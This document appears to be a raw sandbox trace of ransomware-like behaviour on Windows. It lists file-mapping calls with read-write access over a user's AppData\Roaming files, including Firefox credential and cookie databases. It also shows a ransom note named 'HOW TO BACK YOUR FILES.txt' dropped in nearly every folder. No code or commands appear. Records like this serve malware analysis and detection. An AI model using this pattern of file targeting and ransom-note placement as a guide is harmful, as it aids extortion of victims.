Create Mapping C:\Users\FD1HVy\AppData\Roaming\nrGPsGERgaDJPgPU.m4a filename = C:\Users\FD1HVy\AppData\Roaming\nrGPsGERgaDJPgPU.m4a, protection = PAGE_READWRITE, maximum_size = 45648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\PeXqoZ-.png filename = C:\Users\FD1HVy\AppData\Roaming\PeXqoZ-.png, protection = PAGE_READWRITE, maximum_size = 20176 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\pQptGfPg-Sv0bZ6J39X.mkv filename = C:\Users\FD1HVy\AppData\Roaming\pQptGfPg-Sv0bZ6J39X.mkv, protection = PAGE_READWRITE, maximum_size = 81056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\r6veU.mp4 filename = C:\Users\FD1HVy\AppData\Roaming\r6veU.mp4, protection = PAGE_READWRITE, maximum_size = 63776 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\shbgybF2YTr 4USG.m4a filename = C:\Users\FD1HVy\AppData\Roaming\shbgybF2YTr 4USG.m4a, protection = PAGE_READWRITE, maximum_size = 84320 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\SIxZckh.mp3 filename = C:\Users\FD1HVy\AppData\Roaming\SIxZckh.mp3, protection = PAGE_READWRITE, maximum_size = 79936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\SU1bhi PYyXL.m4a filename = C:\Users\FD1HVy\AppData\Roaming\SU1bhi PYyXL.m4a, protection = PAGE_READWRITE, maximum_size = 7168 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\u2g_PYJZ.bmp filename = C:\Users\FD1HVy\AppData\Roaming\u2g_PYJZ.bmp, protection = PAGE_READWRITE, maximum_size = 21632 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\uK 4SUFJ.flv filename = C:\Users\FD1HVy\AppData\Roaming\uK 4SUFJ.flv, protection = PAGE_READWRITE, maximum_size = 56864 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\UOXinrBcB5E_5943Ki.docx filename = C:\Users\FD1HVy\AppData\Roaming\UOXinrBcB5E_5943Ki.docx, protection = PAGE_READWRITE, maximum_size = 53360 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\WORvZy.jpg filename = C:\Users\FD1HVy\AppData\Roaming\WORvZy.jpg, protection = PAGE_READWRITE, maximum_size = 93952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Yffge-8ET9yiGGQUqj.avi filename = C:\Users\FD1HVy\AppData\Roaming\Yffge-8ET9yiGGQUqj.avi, protection = PAGE_READWRITE, maximum_size = 17456 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\YwMCDPenkGT OtMk.m4a filename = C:\Users\FD1HVy\AppData\Roaming\YwMCDPenkGT OtMk.m4a, protection = PAGE_READWRITE, maximum_size = 51264 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\zS4b8o-pTT999 Cto.swf filename = C:\Users\FD1HVy\AppData\Roaming\zS4b8o-pTT999 Cto.swf, protection = PAGE_READWRITE, maximum_size = 62944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\ZuEh.wav filename = C:\Users\FD1HVy\AppData\Roaming\ZuEh.wav, protection = PAGE_READWRITE, maximum_size = 92752 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Sun\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Sun\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Sun\Java\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Sun\Java\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Skype\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Skype\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf filename = C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4, protection = PAGE_READWRITE, maximum_size = 1440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml, protection = PAGE_READWRITE, maximum_size = 280944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db, protection = PAGE_READWRITE, maximum_size = 66304 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json, protection = PAGE_READWRITE, maximum_size = 1584 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite, protection = PAGE_READWRITE, maximum_size = 230144 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite, protection = PAGE_READWRITE, maximum_size = 525056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json, protection = PAGE_READWRITE, maximum_size = 11312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite, protection = PAGE_READWRITE, maximum_size = 5243648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm, protection = PAGE_READWRITE, maximum_size = 33536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal, protection = PAGE_READWRITE, maximum_size = 591056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json, protection = PAGE_READWRITE, maximum_size = 1456 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db, protection = PAGE_READWRITE, maximum_size = 17152 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite, protection = PAGE_READWRITE, maximum_size = 99072 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite, protection = PAGE_READWRITE, maximum_size = 5243648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm, protection = PAGE_READWRITE, maximum_size = 33536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal, protection = PAGE_READWRITE, maximum_size = 2132288 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat, protection = PAGE_READWRITE, maximum_size = 1232 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js, protection = PAGE_READWRITE, maximum_size = 8912 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4, protection = PAGE_READWRITE, maximum_size = 14832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db, protection = PAGE_READWRITE, maximum_size = 17152 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json, protection = PAGE_READWRITE, maximum_size = 1056 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js, protection = PAGE_READWRITE, maximum_size = 5952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt, protection = PAGE_READWRITE, maximum_size = 2592 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite, protection = PAGE_READWRITE, maximum_size = 1280 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite, protection = PAGE_READWRITE, maximum_size = 99072 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json, protection = PAGE_READWRITE, maximum_size = 1120 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2, protection = PAGE_READWRITE, maximum_size = 832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READWRITE, maximum_size = 123648 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, protection = PAGE_READWRITE, maximum_size = 49920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js, protection = PAGE_READWRITE, maximum_size = 8768 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622, protection = PAGE_READWRITE, maximum_size = 14816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json, protection = PAGE_READWRITE, maximum_size = 1120 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib, protection = PAGE_READWRITE, maximum_size = 3232 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info, protection = PAGE_READWRITE, maximum_size = 896 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json, protection = PAGE_READWRITE, maximum_size = 944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json, protection = PAGE_READWRITE, maximum_size = 832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4, protection = PAGE_READWRITE, maximum_size = 3808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 7264 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 6720 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 7312 True 1
Fn
